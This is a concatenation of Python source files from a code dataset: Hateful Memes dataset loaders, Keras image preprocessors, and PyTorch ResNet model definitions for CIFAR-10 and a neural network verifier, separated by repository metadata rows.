        fg_dataset_type = self.config.get("fg_dataset_type", None)
        if fg_dataset_type:
            current_sample = self.process_fg_labels(
                fg_dataset_type=fg_dataset_type,
                sample_info=sample_info,
                current_sample=current_sample,
            )
        elif "label" in sample_info:
            current_sample.targets = torch.tensor(
                sample_info["label"], dtype=torch.long
            )
        return current_sample

    def process_fg_labels(self, fg_dataset_type, sample_info, current_sample):
        """Attach fine-grained answers/targets to ``current_sample``.

        If fg_dataset_type is present, it means we are using
        the Hateful Memes Fine Grained datasets. It is the same
        hateful memes datasets but have additional labels for
        protected groups and attack vectors. More details see:
        https://github.com/facebookresearch/fine_grained_hateful_memes
        """
        ds_type_to_label = {
            "attack": sample_info["top_attacks"],
            "pc": sample_info["top_protectedcats"],
            "pc_attack": sample_info["top_protectedcats"] + sample_info["top_attacks"],
            "hateful_pc_attack": sample_info["top_protectedcats"]
            + sample_info["top_attacks"]
            + ["hateful" if int(sample_info["label"]) == 1 else "not_hateful"],
        }
        processed = self.answer_processor(
            {"answers": ds_type_to_label[fg_dataset_type]}
        )
        current_sample.answers = processed["answers"]
        current_sample.targets = processed["answers_scores"]
        return current_sample

    def format_for_prediction(self, report):
        """Format a report for submission (multilabel scores or binary proba)."""
        if self.is_multilabel:
            return generate_multilabel_prediction(report)
        return generate_binary_prediction(report)
class HatefulMemesImageDataset(MMFDataset):
    """Hateful Memes dataset backed by raw images (no precomputed features)."""

    def __init__(self, config, *args, dataset_name="hateful_memes", **kwargs):
        super().__init__(dataset_name, config, *args, **kwargs)
        assert (
            self._use_images
        ), "config's 'use_images' must be true to use image dataset"
        # Multilabel mode switches prediction formatting to sigmoid scores.
        self.is_multilabel = self.config.get("is_multilabel", False)

    def init_processors(self):
        super().init_processors()
        # Route every image fetched from the image_db through the processor.
        self.image_db.transform = self.image_processor

    def __getitem__(self, idx):
        """Build a Sample with processed text, image and optional targets."""
        annotation = self.annotation_db[idx]

        sample = Sample()

        text_out = self.text_processor({"text": annotation["text"]})
        sample.text = text_out["text"]
        if "input_ids" in text_out:
            sample.update(text_out)

        sample.id = torch.tensor(int(annotation["id"]), dtype=torch.int)
        # image_db yields a list of images per item; only the first is used.
        sample.image = self.image_db[idx]["images"][0]

        if "label" in annotation:
            sample.targets = torch.tensor(annotation["label"], dtype=torch.long)
        return sample

    def format_for_prediction(self, report):
        """Format a report for submission (multilabel scores or binary proba)."""
        formatter = (
            generate_multilabel_prediction
            if self.is_multilabel
            else generate_binary_prediction
        )
        return formatter(report)

    def visualize(self, num_samples=1, use_transforms=False, *args, **kwargs):
        """Render ``num_samples`` randomly chosen memes from the dataset."""
        chosen = np.random.randint(0, len(self), size=num_samples)
        paths = [self.annotation_db[i]["img"] for i in chosen]
        images = self.image_db.from_path(paths, use_transforms=use_transforms)
        visualize_images(images["images"], *args, **kwargs)
class HatefulMemesImageAndFeaturesDataset(MMFDataset):
    """Hateful Memes dataset providing both raw images and region features.

    Requires both ``use_images`` and ``use_features`` in the config; each
    sample carries the processed text, the transformed image, the feature
    entry mapped from the image path, and optional targets.
    """

    def __init__(self, config, *args, dataset_name="hateful_memes", **kwargs):
        super().__init__(dataset_name, config, *args, **kwargs)
        assert (
            self._use_features and self._use_images
        ), "config's 'use_images' and 'use_features' must be true to use both image and feature dataset"
        # Multilabel mode switches prediction formatting to sigmoid scores.
        self.is_multilabel = self.config.get("is_multilabel", False)

    def init_processors(self):
        super().init_processors()
        # Assign transforms to the image_db
        self.image_db.transform = self.image_processor

    def preprocess_sample_info(self, sample_info):
        """Add the ``feature_path`` key used by the features database."""
        image_path = sample_info["img"]
        # img/02345.png -> 02345
        feature_path = image_path.split("/")[-1].split(".")[0]
        # Add feature_path key for feature_database access
        sample_info["feature_path"] = f"{feature_path}.npy"
        return sample_info

    def __getitem__(self, idx):
        """Build a Sample with text, image, features and optional targets."""
        sample_info = self.annotation_db[idx]
        sample_info = self.preprocess_sample_info(sample_info)

        current_sample = Sample()

        processed_text = self.text_processor({"text": sample_info["text"]})
        current_sample.text = processed_text["text"]
        if "input_ids" in processed_text:
            current_sample.update(processed_text)

        current_sample.id = torch.tensor(int(sample_info["id"]), dtype=torch.int)

        # Get the first image from the set of images returned from the image_db
        current_sample.image = self.image_db[idx]["images"][0]

        # Instead of using idx directly here, use sample_info to fetch
        # the features as feature_path has been dynamically added
        features = self.features_db.get(sample_info)
        if hasattr(self, "transformer_bbox_processor"):
            features["image_info_0"] = self.transformer_bbox_processor(
                features["image_info_0"]
            )
        current_sample.update(features)

        fg_dataset_type = self.config.get("fg_dataset_type", None)
        if fg_dataset_type:
            current_sample = self.process_fg_labels(
                fg_dataset_type=fg_dataset_type,
                sample_info=sample_info,
                current_sample=current_sample,
            )
        else:
            if "label" in sample_info:
                current_sample.targets = torch.tensor(
                    sample_info["label"], dtype=torch.long
                )
        return current_sample

    def process_fg_labels(self, fg_dataset_type, sample_info, current_sample):
        """
        If fg_dataset_type is present, it means we are using
        the Hateful Memes Fine Grained datasets. It is the same
        hateful memes datasets but have additional labels for
        protected groups and attack vectors. More details see:
        https://github.com/facebookresearch/fine_grained_hateful_memes
        """
        ds_type_to_label = {
            "attack": sample_info["top_attacks"],
            "pc": sample_info["top_protectedcats"],
            "pc_attack": sample_info["top_protectedcats"] + sample_info["top_attacks"],
            "hateful_pc_attack": sample_info["top_protectedcats"]
            + sample_info["top_attacks"]
            + ["hateful" if int(sample_info["label"]) == 1 else "not_hateful"],
        }
        processed = self.answer_processor(
            {"answers": ds_type_to_label[fg_dataset_type]}
        )
        current_sample.answers = processed["answers"]
        current_sample.targets = processed["answers_scores"]
        return current_sample

    def format_for_prediction(self, report):
        """Format a report for submission (multilabel scores or binary proba)."""
        if self.is_multilabel:
            return generate_multilabel_prediction(report)
        else:
            return generate_binary_prediction(report)
def generate_binary_prediction(report):
    """Turn raw logits into binary Hateful Memes predictions.

    Returns one dict per sample with the meme id, the softmax probability
    that the meme is hateful (class index 1), and the argmax label.
    """
    scores = torch.nn.functional.softmax(report.scores, dim=1)
    hateful_probs = scores[:, 1]
    labels = scores.argmax(dim=1)
    return [
        {
            "id": image_id.item(),
            "proba": hateful_probs[row].item(),
            "label": labels[row].item(),
        }
        for row, image_id in enumerate(report.id)
    ]
def generate_multilabel_prediction(report):
    """Return independent per-class sigmoid scores for every sample."""
    probs = torch.sigmoid(report.scores)
    predictions = []
    for row, image_id in enumerate(report.id):
        predictions.append({"id": image_id.item(), "scores": probs[row].tolist()})
    return predictions
| 39.276923 | 104 | 0.652761 | 1,222 | 10,212 | 5.162848 | 0.148118 | 0.087177 | 0.032969 | 0.03281 | 0.829291 | 0.826914 | 0.826914 | 0.821366 | 0.811222 | 0.811222 | 0 | 0.004968 | 0.250979 | 10,212 | 259 | 105 | 39.428571 | 0.819846 | 0.121328 | 0 | 0.721925 | 0 | 0 | 0.108148 | 0.005876 | 0 | 0 | 0 | 0 | 0.016043 | 1 | 0.096257 | false | 0 | 0.058824 | 0 | 0.251337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6088c95fcb6703defe1575c92ace84258115fbad | 2,222 | py | Python | keras_image_helper/preprocessors.py | alexeygrigorev/keras-image-helper | 1fea06a0e1343133f7c2ecdc7d7a9390d0503ae5 | [
"WTFPL"
] | 4 | 2020-10-31T15:53:34.000Z | 2021-11-27T10:35:21.000Z | keras_image_helper/preprocessors.py | alexeygrigorev/keras-image-helper | 1fea06a0e1343133f7c2ecdc7d7a9390d0503ae5 | [
"WTFPL"
] | null | null | null | keras_image_helper/preprocessors.py | alexeygrigorev/keras-image-helper | 1fea06a0e1343133f7c2ecdc7d7a9390d0503ae5 | [
"WTFPL"
] | null | null | null |
from keras_image_helper.base import BasePreprocessor
def tf_preprocessing(x):
    """Keras 'tf'-mode preprocessing: rescale pixels from [0, 255] to [-1, 1].

    NOTE: uses augmented assignment, so a NumPy (or other mutable) input is
    modified in place; the same object is returned.
    """
    x /= 127.5
    x -= 1.0
    return x
def caffe_preprocessing(x):
    """Keras 'caffe'-mode preprocessing: flip RGB->BGR, then subtract the
    per-channel ImageNet means (given in BGR order).

    The subtraction happens in place on the channel-reversed view, so the
    underlying input buffer is mutated.
    """
    # 'RGB'->'BGR'
    x = x[..., ::-1]
    for channel, channel_mean in enumerate((103.939, 116.779, 123.68)):
        x[..., channel] -= channel_mean
    return x
class ResnetPreprocessor(BasePreprocessor):
    # Delegates to caffe_preprocessing (RGB->BGR + per-channel mean
    # subtraction), i.e. Keras' _preprocess_numpy_input with mode == 'caffe':
    # https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
    # NOTE(review): the original comment here referenced xception.py and
    # mode='tf', which contradicts the caffe_preprocessing call below —
    # presumably a copy-paste slip from XceptionPreprocessor.
    def preprocess(self, X):
        return caffe_preprocessing(X)
class XceptionPreprocessor(BasePreprocessor):
    # Xception uses Keras 'tf'-mode preprocessing (scale to [-1, 1]):
    # https://github.com/keras-team/keras-applications/blob/master/keras_applications/xception.py
    #   preprocess_input: imagenet_utils.preprocess_input(x, mode='tf', **kwargs)
    # https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
    #   _preprocess_numpy_input, mode == 'tf'
    def preprocess(self, x):
        return tf_preprocessing(x)
class VGGPreprocessor(BasePreprocessor):
    # VGG16 uses Keras 'caffe'-mode preprocessing (RGB->BGR + mean subtraction):
    # https://github.com/keras-team/keras-applications/blob/master/keras_applications/vgg16.py
    #   preprocess_input = imagenet_utils.preprocess_input
    # https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
    #   _preprocess_numpy_input, mode == 'caffe'
    def preprocess(self, x):
        return caffe_preprocessing(x)
class InceptionPreprocessor(BasePreprocessor):
    # InceptionV3 uses Keras 'tf'-mode preprocessing (scale to [-1, 1]):
    # https://github.com/keras-team/keras-applications/blob/master/keras_applications/inception_v3.py
    #   imagenet_utils.preprocess_input(x, mode='tf', **kwargs)
    # https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
    #   _preprocess_numpy_input, mode == 'tf'
    def preprocess(self, x):
        return tf_preprocessing(x)
60da722310c6fb91415e92b1feb39769b5aba71b | 12,631 | py | Python | model/ResNet.py | shamoji101/Pytorch-Gym | d16e25e5034d241b75bece5e20b3421a81a94b5c | [
"MIT"
] | 4 | 2018-09-23T10:15:38.000Z | 2018-11-11T23:59:12.000Z | model/ResNet.py | shamoji101/Pytorch-Gym | d16e25e5034d241b75bece5e20b3421a81a94b5c | [
"MIT"
] | 1 | 2018-09-25T13:53:58.000Z | 2018-09-25T13:57:10.000Z | model/ResNet.py | shamoji101/Pytorch-Gym | d16e25e5034d241b75bece5e20b3421a81a94b5c | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.nn import functional as F
"""
This module builds ResNet models for CIFAR-10.
The original ResNet paper is available at
https://arxiv.org/abs/1512.03385
"""
class ResBlock(nn.Module):
    """Plain residual block with an identity shortcut.

    Two conv+BN+ReLU stages form the residual branch; the input is added
    back (``short cut``) and passed through a final ReLU.
    """

    def __init__(self, Channel, kernel_size=3, padding=1, use_dropout=True):
        super(ResBlock, self).__init__()
        self.C = Channel
        self.K = kernel_size
        self.P = padding
        # Both convolutions keep the channel count and (with the default
        # kernel/padding) the spatial size unchanged.
        self.FirstConv = nn.Conv2d(self.C, self.C, kernel_size=self.K, padding=padding)
        self.bn1 = nn.BatchNorm2d(self.C)
        self.LastConv = nn.Conv2d(self.C, self.C, kernel_size=self.K, padding=padding)
        self.bn2 = nn.BatchNorm2d(self.C)
        self.use_dropout = use_dropout
        self.dropout = nn.Dropout(p=0.25, inplace=False)

    def forward(self, x):
        branch = F.relu(self.bn1(self.FirstConv(x)))
        branch = F.relu(self.bn2(self.LastConv(branch)))
        if self.use_dropout:
            branch = self.dropout(branch)
        # short cut
        return F.relu(branch + x)
class ResBottleneck(nn.Module):
    """Bottleneck residual block: 1x1 reduce -> KxK -> 1x1 expand + identity.

    The inner convolution runs at a quarter of the channel width
    (``Channel // 4``); the input is added back before the final ReLU.
    """

    def __init__(self, Channel, kernel_size=3, padding=1, use_dropout=True):
        super(ResBottleneck, self).__init__()
        self.C = Channel
        self.K = kernel_size
        self.P = padding
        self.C_small = self.C // 4
        self.use_dropout = use_dropout
        self.FirstConv = nn.Conv2d(self.C, self.C_small, kernel_size=1)
        self.bn1 = nn.BatchNorm2d(self.C_small)
        self.BottleneckConv = nn.Conv2d(self.C_small, self.C_small, kernel_size=self.K, padding=self.P)
        self.bn2 = nn.BatchNorm2d(self.C_small)
        self.LastConv = nn.Conv2d(self.C_small, self.C, kernel_size=1)
        self.bn3 = nn.BatchNorm2d(self.C)
        self.dropout = nn.Dropout(p=0.25, inplace=False)

    def forward(self, x):
        branch = x
        # conv -> BN -> ReLU, three times (reduce, bottleneck, expand).
        for conv, bn in ((self.FirstConv, self.bn1),
                         (self.BottleneckConv, self.bn2),
                         (self.LastConv, self.bn3)):
            branch = F.relu(bn(conv(branch)))
        if self.use_dropout:
            branch = self.dropout(branch)
        # short cut
        return F.relu(branch + x)
class IncreaseChannel_ResBlock(nn.Module):
    """Conv block that changes the channel count (and, via stride, the
    spatial size).

    NOTE(review): despite the "Res" name, forward() performs NO shortcut
    addition — DownsampleConv/bn3 are constructed but never used.
    Presumably a residual shortcut was intended but left unwired; confirm
    before relying on residual behavior.
    """

    def __init__(self, input_Channel, after_Channel, kernel_size, stride, padding, use_dropout=True):
        super(IncreaseChannel_ResBlock, self).__init__()
        self.I = input_Channel   # input channel count
        self.A = after_Channel   # output channel count
        self.K = kernel_size
        self.P = padding
        self.S = stride
        self.FirstConv = nn.Conv2d(self.I, self.A, kernel_size=self.K, stride=self.S, padding=self.P)
        self.bn1 = nn.BatchNorm2d(self.A)
        self.use_dropout = use_dropout
        self.dropout = nn.Dropout(p=0.25, inplace=False)
        self.LastConv = nn.Conv2d(self.A, self.A, kernel_size=3, padding=1)
        self.bn2 = nn.BatchNorm2d(self.A)
        # Unused in forward() — see class note above.
        self.DownsampleConv = nn.Conv2d(self.I, self.A, kernel_size=self.K, stride=self.S, padding=self.P)
        self.bn3 = nn.BatchNorm2d(self.A)

    def forward(self, x):
        out = self.FirstConv(x)
        out = self.bn1(out)
        out = F.relu(out)
        out = self.LastConv(out)
        out = self.bn2(out)
        out = F.relu(out)
        if self.use_dropout:
            out = self.dropout(out)
        # Second ReLU on an already non-negative tensor — effectively identity.
        out = F.relu(out)
        return out
class IncreaseChannel_ResBottleneck(nn.Module):
    """Bottleneck-style block that changes the channel count and may
    downsample via the middle convolution's stride.

    NOTE(review): despite the "Res" name there is no shortcut addition in
    forward() — it is a plain 1x1 -> 3x3 -> 1x1 stack.  Also note that the
    ``kernel_size`` and ``padding`` arguments are stored (self.K / self.P)
    but never used: the convolutions hard-code kernel sizes 1, 3, 1.
    """

    def __init__(self, input_Channel, after_Channel, kernel_size, stride, padding, isFirstConv=False, use_dropout=True):
        super(IncreaseChannel_ResBottleneck, self).__init__()
        self.I = input_Channel
        # Mid (bottleneck) width: full input width for the stem block,
        # half the input width otherwise.
        if isFirstConv:
            self.M = self.I
        else:
            self.M = self.I // 2
        self.A = after_Channel
        self.K = kernel_size
        self.P = padding
        self.S = stride
        self.FirstConv = nn.Conv2d(self.I, self.M, kernel_size=1, stride=1, padding=0)
        self.bn1 = nn.BatchNorm2d(self.M)
        self.use_dropout = use_dropout
        self.dropout = nn.Dropout(p=0.25, inplace=False)
        self.SecondConv = nn.Conv2d(self.M, self.M, kernel_size=3, stride=self.S, padding=1)
        self.bn2 = nn.BatchNorm2d(self.M)
        self.LastConv = nn.Conv2d(self.M, self.A, kernel_size=1, padding=0)
        self.bn3 = nn.BatchNorm2d(self.A)

    def forward(self, x):
        x = self.FirstConv(x)
        x = self.bn1(x)
        x = F.relu(x)
        x = self.SecondConv(x)
        x = self.bn2(x)
        x = F.relu(x)
        x = self.LastConv(x)
        x = self.bn3(x)
        if self.use_dropout:
            x = self.dropout(x)
        x = F.relu(x)
        return x
class pre_act_ResBlock(nn.Module):
    """Pre-activation residual block.

    According to "Identity Mappings in Deep Residual Networks"
    (https://arxiv.org/abs/1603.05027): BN and ReLU are applied *before*
    each convolution, and the shortcut sum gets no trailing activation.
    """
    def __init__(self, Channel, kernel_size=3, padding=1, use_dropout=True):
        super(pre_act_ResBlock, self).__init__()
        self.C = Channel
        self.K = kernel_size
        self.P = padding
        self.FirstConv = nn.Conv2d(self.C, self.C, kernel_size=self.K, padding=padding)
        self.bn1 = nn.BatchNorm2d(self.C)
        self.LastConv = nn.Conv2d(self.C, self.C, kernel_size=self.K, padding=padding)
        self.bn2 = nn.BatchNorm2d(self.C)
        self.use_dropout = use_dropout
        self.dropout = nn.Dropout(p=0.25, inplace=False)

    def forward(self, x):
        # Pre-activation: BN -> ReLU -> conv, twice.
        out = self.bn1(x)
        out = F.relu(out)
        out = self.FirstConv(out)
        out = self.bn2(out)
        out = F.relu(out)
        F_x = self.LastConv(out)
        if self.use_dropout:
            F_x = self.dropout(F_x)
        # Identity shortcut, no post-activation (pre-act design).
        y = F_x + x
        return y
class pre_act_ResBottleneck(nn.Module):
    """Pre-activation bottleneck residual block (He et al., "Identity
    Mappings in Deep Residual Networks", https://arxiv.org/abs/1603.05027).

    BN/ReLU precede each convolution and the identity shortcut is added
    without a final activation.

    Fixes vs. the original code:
      * ``self.C = Channel`` was missing, so ``self.C_small = self.C // 4``
        raised AttributeError at construction time.
      * The BatchNorm widths were mismatched with the tensors they receive
        in forward(): bn1 normalizes the C-channel block input, while
        bn2/bn3 normalize the C//4-channel bottleneck activations.
    """

    def __init__(self, Channel, kernel_size=3, padding=1, use_dropout=True):
        super(pre_act_ResBottleneck, self).__init__()
        self.C = Channel
        self.K = kernel_size
        self.P = padding
        self.C_small = self.C // 4
        self.use_dropout = use_dropout
        self.FirstConv = nn.Conv2d(self.C, self.C_small, kernel_size=1)
        self.bn1 = nn.BatchNorm2d(self.C)        # normalizes the block input
        self.BottleneckConv = nn.Conv2d(self.C_small, self.C_small, kernel_size=self.K, padding=self.P)
        self.bn2 = nn.BatchNorm2d(self.C_small)  # after the 1x1 reduction
        self.LastConv = nn.Conv2d(self.C_small, self.C, kernel_size=1)
        self.bn3 = nn.BatchNorm2d(self.C_small)  # after the KxK convolution
        self.dropout = nn.Dropout(p=0.25, inplace=False)

    def forward(self, x):
        out = self.bn1(x)
        out = F.relu(out)
        out = self.FirstConv(out)
        out = self.bn2(out)
        out = F.relu(out)
        out = self.BottleneckConv(out)
        out = self.bn3(out)
        out = F.relu(out)
        F_x = self.LastConv(out)
        if self.use_dropout:
            F_x = self.dropout(F_x)
        y = F_x + x  # identity short cut, no post-activation (pre-act design)
        return y
class ResNet18_forCIFAR10(nn.Module):
    """ResNet-18-style CIFAR-10 network built from the blocks above.

    Four stages of width 64/128/256/512; each stage opens with a
    channel-increasing block (stride 2 after the stem) followed by one
    plain ResBlock, then global average pooling and a linear classifier.
    """
    def __init__(self):
        super(ResNet18_forCIFAR10, self).__init__()
        self.FirstConv = IncreaseChannel_ResBlock(3, 64, kernel_size=3, stride=1, padding=1)
        self.Conv2_1 = ResBlock(64, kernel_size=3, padding=1)
        self.SecondConv = IncreaseChannel_ResBlock(64, 128, kernel_size=3, stride=2, padding=1)
        self.Conv3_1 = ResBlock(128, kernel_size=3, padding=1)
        self.ThirdConv = IncreaseChannel_ResBlock(128, 256, kernel_size=3, stride=2, padding=1)
        self.Conv4_1 = ResBlock(256, kernel_size=3, padding=1)
        self.LastConv = IncreaseChannel_ResBlock(256, 512, kernel_size=3, stride=2, padding=1)
        self.Conv5_1 = ResBlock(512, kernel_size=3, padding=1)
        self.GAP = nn.AvgPool2d(4)
        self.Dense = nn.Linear(512, 10)

    def forward(self, x):
        x = self.FirstConv(x)
        x = self.Conv2_1(x)
        x = self.SecondConv(x)
        x = self.Conv3_1(x)
        x = self.ThirdConv(x)
        x = self.Conv4_1(x)
        x = self.LastConv(x)
        x = self.Conv5_1(x)
        x = self.GAP(x)
        x = x.view(-1, 512)
        x = self.Dense(x)
        return x
class ResNet34_forCIFAR10(nn.Module):
    """ResNet-34-style CIFAR-10 network: same stage layout as the 18-layer
    variant but with 2/3/5/2 plain ResBlocks per stage."""
    def __init__(self):
        super(ResNet34_forCIFAR10, self).__init__()
        self.FirstConv = IncreaseChannel_ResBlock(3, 64, kernel_size=3, stride=1, padding=1)
        self.Conv2_1 = ResBlock(64, kernel_size=3, padding=1)
        self.Conv2_2 = ResBlock(64, kernel_size=3, padding=1)
        self.SecondConv = IncreaseChannel_ResBlock(64, 128, kernel_size=3, stride=2, padding=1)
        self.Conv3_1 = ResBlock(128, kernel_size=3, padding=1)
        self.Conv3_2 = ResBlock(128, kernel_size=3, padding=1)
        self.Conv3_3 = ResBlock(128, kernel_size=3, padding=1)
        self.ThirdConv = IncreaseChannel_ResBlock(128, 256, kernel_size=3, stride=2, padding=1)
        self.Conv4_1 = ResBlock(256, kernel_size=3, padding=1)
        self.Conv4_2 = ResBlock(256, kernel_size=3, padding=1)
        self.Conv4_3 = ResBlock(256, kernel_size=3, padding=1)
        self.Conv4_4 = ResBlock(256, kernel_size=3, padding=1)
        self.Conv4_5 = ResBlock(256, kernel_size=3, padding=1)
        self.LastConv = IncreaseChannel_ResBlock(256, 512, kernel_size=3, stride=2, padding=1)
        self.Conv5_1 = ResBlock(512, kernel_size=3, padding=1)
        self.Conv5_2 = ResBlock(512, kernel_size=3, padding=1)
        self.GAP = nn.AvgPool2d(4)
        self.Dense = nn.Linear(512, 10)

    def forward(self, x):
        x = self.FirstConv(x)
        x = self.Conv2_1(x)
        x = self.Conv2_2(x)
        x = self.SecondConv(x)
        x = self.Conv3_1(x)
        x = self.Conv3_2(x)
        x = self.Conv3_3(x)
        x = self.ThirdConv(x)
        x = self.Conv4_1(x)
        x = self.Conv4_2(x)
        x = self.Conv4_3(x)
        x = self.Conv4_4(x)
        x = self.Conv4_5(x)
        x = self.LastConv(x)
        x = self.Conv5_1(x)
        x = self.Conv5_2(x)
        x = self.GAP(x)
        x = x.view(-1, 512)
        x = self.Dense(x)
        return x
class ResNet50_forCIFAR10(nn.Module):
    """ResNet-50-style CIFAR-10 network using bottleneck blocks; stage
    widths are 256/512/1024/2048 with 2/3/5/2 bottlenecks per stage."""
    def __init__(self):
        super(ResNet50_forCIFAR10, self).__init__()
        self.FirstConv = IncreaseChannel_ResBottleneck(3, 256, kernel_size=3, stride=1, padding=1, isFirstConv=True)
        self.Conv2_1 = ResBottleneck(256, kernel_size=3, padding=1)
        self.Conv2_2 = ResBottleneck(256, kernel_size=3, padding=1)
        self.SecondConv = IncreaseChannel_ResBottleneck(256, 512, kernel_size=3, stride=2, padding=1)
        self.Conv3_1 = ResBottleneck(512, kernel_size=3, padding=1)
        self.Conv3_2 = ResBottleneck(512, kernel_size=3, padding=1)
        self.Conv3_3 = ResBottleneck(512, kernel_size=3, padding=1)
        self.ThirdConv = IncreaseChannel_ResBottleneck(512, 1024, kernel_size=3, stride=2, padding=1)
        self.Conv4_1 = ResBottleneck(1024, kernel_size=3, padding=1)
        self.Conv4_2 = ResBottleneck(1024, kernel_size=3, padding=1)
        self.Conv4_3 = ResBottleneck(1024, kernel_size=3, padding=1)
        self.Conv4_4 = ResBottleneck(1024, kernel_size=3, padding=1)
        self.Conv4_5 = ResBottleneck(1024, kernel_size=3, padding=1)
        self.LastConv = IncreaseChannel_ResBottleneck(1024, 2048, kernel_size=3, stride=2, padding=1)
        self.Conv5_1 = ResBottleneck(2048, kernel_size=3, padding=1)
        self.Conv5_2 = ResBottleneck(2048, kernel_size=3, padding=1)
        self.GAP = nn.AvgPool2d(4)
        self.Dense = nn.Linear(2048, 10)

    def forward(self, x):
        x = self.FirstConv(x)
        x = self.Conv2_1(x)
        x = self.Conv2_2(x)
        x = self.SecondConv(x)
        x = self.Conv3_1(x)
        x = self.Conv3_2(x)
        x = self.Conv3_3(x)
        x = self.ThirdConv(x)
        x = self.Conv4_1(x)
        x = self.Conv4_2(x)
        x = self.Conv4_3(x)
        x = self.Conv4_4(x)
        x = self.Conv4_5(x)
        x = self.LastConv(x)
        x = self.Conv5_1(x)
        x = self.Conv5_2(x)
        x = self.GAP(x)
        x = x.view(-1, 2048)
        x = self.Dense(x)
        return x
| 29.86052 | 120 | 0.583406 | 1,772 | 12,631 | 3.99605 | 0.066591 | 0.096032 | 0.04152 | 0.083886 | 0.895919 | 0.859624 | 0.837876 | 0.800593 | 0.755119 | 0.692275 | 0 | 0.061054 | 0.298472 | 12,631 | 422 | 121 | 29.93128 | 0.738066 | 0.01148 | 0 | 0.751799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064748 | false | 0 | 0.010791 | 0 | 0.140288 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60ded3bd5fa41b5db3cc63e17fb28129b3b5047a | 39,100 | py | Python | complete_verifier/model_defs.py | nhamlv-55/alpha-beta-CROWN | c299ce432acb30ab0203f58c591d91e3e39439c2 | [
"BSD-3-Clause"
] | null | null | null | complete_verifier/model_defs.py | nhamlv-55/alpha-beta-CROWN | c299ce432acb30ab0203f58c591d91e3e39439c2 | [
"BSD-3-Clause"
] | null | null | null | complete_verifier/model_defs.py | nhamlv-55/alpha-beta-CROWN | c299ce432acb30ab0203f58c591d91e3e39439c2 | [
"BSD-3-Clause"
] | null | null | null | #########################################################################
## This file is part of the alpha-beta-CROWN verifier ##
## ##
## Copyright (C) 2021, Huan Zhang <huan@huan-zhang.com> ##
## Kaidi Xu <xu.kaid@northeastern.edu> ##
## Shiqi Wang <sw3215@columbia.edu> ##
## Zhouxing Shi <zshi@cs.ucla.edu> ##
## Yihan Wang <yihanwang@ucla.edu> ##
## ##
## This program is licenced under the BSD 3-Clause License, ##
## contained in the LICENCE file in this directory. ##
## ##
#########################################################################
import torch
from torch.nn import functional as F
import torch.nn as nn
from collections import OrderedDict
import math
import importlib
from functools import partial
########################################
# Defined the model architectures
########################################
class Flatten(nn.Module):
    """Collapse all non-batch dimensions: (N, ...) -> (N, prod(...))."""

    def forward(self, x):
        batch = x.size(0)
        return x.reshape(batch, -1)
class BasicBlock(nn.Module):
    """ResNet BasicBlock with configurable kernel size and optional BN.

    Conv biases are enabled only when batch norm is off (``bias=(not bn)``),
    since BN would make them redundant.  The shortcut becomes a 1x1
    projection (with BN when enabled) whenever the stride or channel count
    changes; otherwise it is the identity.
    """
    expansion = 1

    def __init__(self, in_planes, planes, stride=1, bn=True, kernel=3):
        super(BasicBlock, self).__init__()
        self.bn = bn
        # Padding is chosen per kernel size so the second conv preserves
        # the spatial size produced by the first.
        if kernel == 3:
            # can only do planes 16, block1
            self.conv1 = nn.Conv2d(
                in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=(not self.bn))
            if self.bn:
                self.bn1 = nn.BatchNorm2d(planes)
            self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
                                   stride=1, padding=1, bias=(not self.bn))
        elif kernel == 2:
            # can do planes 32
            self.conv1 = nn.Conv2d(
                in_planes, planes, kernel_size=2, stride=stride, padding=1, bias=(not self.bn))
            if self.bn:
                self.bn1 = nn.BatchNorm2d(planes)
            self.conv2 = nn.Conv2d(planes, planes, kernel_size=2,
                                   stride=1, padding=0, bias=(not self.bn))
        elif kernel == 1:
            # can only do planes 16, block1
            self.conv1 = nn.Conv2d(
                in_planes, planes, kernel_size=1, stride=stride, padding=0, bias=(not self.bn))
            if self.bn:
                self.bn1 = nn.BatchNorm2d(planes)
            self.conv2 = nn.Conv2d(planes, planes, kernel_size=1,
                                   stride=1, padding=0, bias=(not self.bn))
        else:
            exit("kernel not supported!")

        if self.bn:
            self.bn2 = nn.BatchNorm2d(planes)

        self.shortcut = nn.Sequential()
        if stride != 1 or in_planes != self.expansion*planes:
            if self.bn:
                self.shortcut = nn.Sequential(
                    nn.Conv2d(in_planes, self.expansion*planes,
                              kernel_size=1, stride=stride, bias=(not self.bn)),
                    nn.BatchNorm2d(self.expansion*planes)
                )
            else:
                self.shortcut = nn.Sequential(
                    nn.Conv2d(in_planes, self.expansion*planes,
                              kernel_size=1, stride=stride, bias=(not self.bn)),
                )

    def forward(self, x):
        if self.bn:
            out = F.relu(self.bn1(self.conv1(x)))
            # print("residual relu:", out.shape, out[0].view(-1).shape)
            out = self.bn2(self.conv2(out))
        else:
            out = F.relu(self.conv1(x))
            # print("residual relu:", out.shape, out[0].view(-1).shape)
            out = self.conv2(out)
        out += self.shortcut(x)
        out = F.relu(out)
        # print("residual relu:", out.shape, out[0].view(-1).shape)
        return out
class ResNet(nn.Module):
    """Standard CIFAR-style ResNet: conv stem + 4 stages + avgpool + linear.

    Stage widths double (in_planes * 1/2/4/8) while strides 1/2/2/2 halve
    the spatial resolution from the second stage on.
    """
    def __init__(self, block, num_blocks, num_classes=10, in_planes=64):
        super(ResNet, self).__init__()
        self.in_planes = in_planes
        self.conv1 = nn.Conv2d(3, in_planes, kernel_size=3,
                               stride=1, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(in_planes)
        self.layer1 = self._make_layer(block, in_planes, num_blocks[0], stride=1)
